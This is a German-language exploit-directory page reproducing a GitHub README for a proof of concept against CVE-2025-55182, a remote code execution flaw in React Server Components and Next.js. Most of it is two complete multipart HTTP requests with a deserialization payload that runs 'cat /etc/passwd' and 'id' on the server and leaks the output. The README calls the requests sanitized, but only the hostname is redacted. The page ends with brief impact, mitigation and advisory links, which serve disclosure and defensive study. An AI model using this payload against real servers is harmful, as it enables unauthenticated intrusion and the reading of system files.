Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell_Rce-cve-2025-55182 — React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0, einschließlich react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack, enthalten eine Sicherheitslücke für die Ausführung von Remote-Code. | Kitploit
Tools/GitHubGitHub
/
muhammadwaseem29
/react2shell_rce-cve-2025-55182
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubmuhammadwaseem29/react2shell_rce-cve-2025-55182

React2Shell_Rce-cve-2025-55182

React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0, einschließlich react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack, enthalten eine Sicherheitslücke für die Ausführung von Remote-Code.

Repository anzeigenWebseite
32vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React Server Components RCE – README

Hallo, ich hoffe wirklich, dass bei dir alles großartig ist! 😊✨

Beschreibung

React Server Components der Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0, einschließlich react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack, enthalten eine Sicherheitslücke zur Remote-Code-Ausführung.

Das Problem wird durch unsichere Deserialisierung von angreiferkontrollierten Nutzlasten ausgelöst, die an Server-Function-Endpunkte gesendet werden.


PoC – Vollständige Anfrage (bereinigt)

Unten steht die vollständige HTTP-Anfrage, die die Sicherheitslücke demonstriert, wobei sensible Befehle durch Platzhalter ersetzt wurden. Ersetzen Sie durch Ihren Zielhost.

redacted.com
root@kitploit:~
POST / HTTP/1.1
Host: redacted.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Screenshot 06.12.2025 um 23:49:57

id-Befehl

root@kitploit:~
POST / HTTP/1.1
Host: redecated.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Screenshot 06.12.2025 um 23:55:21

PoC-Zusammenfassung:

  • Der Server deserialisiert strukturierte Nutzlasten aus der Multipart-Anfrage.
  • Unsichere Deserialisierung ermöglicht es einem Angreifer, den Ausführungsablauf zu beeinflussen.
  • Aus Sicherheitsgründen wurden sensible Befehle durch Platzhalter ersetzt.

Auswirkungen

Nicht authentifizierte Angreifer können beliebigen Code remote ausführen, was möglicherweise zu einer vollständigen Systemkompromittierung führt.


Abhilfe

Aktualisieren Sie auf die neueste React-Server-Components-Version, in der die Pfade unsicherer Deserialisierung gepatcht wurden.


Referenzen

  • https://github.com/assetnote/react2shell-scanner
  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://www.facebook.com/security/advisories/cve-2025-55182
  • http://www.openwall.com/lists/oss-security/2025/12/03/4
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
  • https://vercel.com/changelog/cve-2025-55182

Mögest du auf deiner Seite des Bildschirms wohlbehalten sein :) ✨❤️

Tool herunterladen